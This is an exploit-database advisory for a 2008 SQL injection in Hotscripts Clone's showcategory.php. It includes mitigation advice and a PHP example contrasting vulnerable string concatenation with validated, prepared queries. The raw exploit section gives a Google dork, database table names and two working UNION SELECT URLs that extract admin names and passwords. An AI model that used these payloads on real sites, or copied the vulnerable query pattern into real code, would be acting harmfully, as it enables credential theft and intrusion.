Vendor: Hotscripts Clone
By: Hussin X
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Hotscripts Clone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Hotscripts Clone (cid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Hotscripts Clone, which allows an attacker to execute arbitrary SQL commands via the 'cid' parameter in the 'showcategory.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can result in the disclosure of sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should reject malformed values of the 'cid' parameter before they reach the database. Additionally, the application should issue its queries through parameterized (prepared) statements so that user input can never alter the structure of the SQL statement.
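The two mitigations above, as an added example that is not code from Hotscripts Clone or from the advisory: a hypothetical showcategory.php handler showing the injectable string-building pattern beside a hardened version that validates 'cid' as an integer and binds it in a prepared statement. The table layout, column names and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
// Added example, not Hotscripts Clone's code: a hypothetical showcategory.php
// handler in its vulnerable and hardened forms. The table and column names
// (categories: cid, name) and the SQLite in-memory database are assumptions.

// VULNERABLE pattern: the untrusted 'cid' value is spliced into the SQL string,
// so a value that is not a number changes the structure of the query itself.
function build_query_vulnerable(string $cid): string
{
    return "SELECT cid, name FROM categories WHERE cid = " . $cid;
}

// HARDENED, step 1 (input validation): a category id is a plain non-negative
// integer; anything else is rejected before it gets anywhere near the database.
function validate_cid(string $raw): ?int
{
    return preg_match('/^[0-9]{1,9}$/', $raw) ? (int) $raw : null;
}

// HARDENED, step 2 (parameterized query): the SQL text is fixed at prepare time
// and the value is bound separately, so it can only ever be compared as data.
function fetch_category(PDO $db, int $cid): ?array
{
    $stmt = $db->prepare('SELECT cid, name FROM categories WHERE cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample database so the example runs offline (needs pdo_sqlite).
// With pdo_mysql, also pass PDO::ATTR_EMULATE_PREPARES => false so the server,
// not the client driver, performs the parameter binding.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE categories (cid INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO categories VALUES (27, 'PHP Scripts'), (28, 'Perl Scripts')");

// Simulated requests: a legitimate id and a non-numeric value of the shape the
// advisory describes. The second is rejected and never reaches a query.
foreach (['27', '-27 UNION SELECT 1,2'] as $raw) {
    $cid = validate_cid($raw);
    if ($cid === null) {
        echo "rejected: " . $raw . PHP_EOL;   // the real handler would send HTTP 400
        continue;
    }
    $row = fetch_category($db, $cid);
    echo "ok: " . ($row ? $row['name'] : 'no such category') . PHP_EOL;
}
```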
Source

Exploit-DB raw data:

|___________________________________________________|
|
| Hotscripts Clone (cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.greatclone.com/product_info.php?cPath=31&products_id=81
|
| DorK   : inurl:add_soft.php
|___________________________________________________|


sbwmd_config:username_len
sbwmd_email_id:useremail
sbwmd_mailing_list:username
sbwmd_mailing_list:useremail
sbwmd_members:username
sbwmd_admin:pwd>freemagics
sbwmd_config:pwd_len
sbwmd_members:pwd
sbwmd_admin:admin_name
sbwmd_config:admin_email
sbwmd_softwares:admin_desc





www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin--


OR


www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin--






____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi

# milw0rm.com [2008-09-24]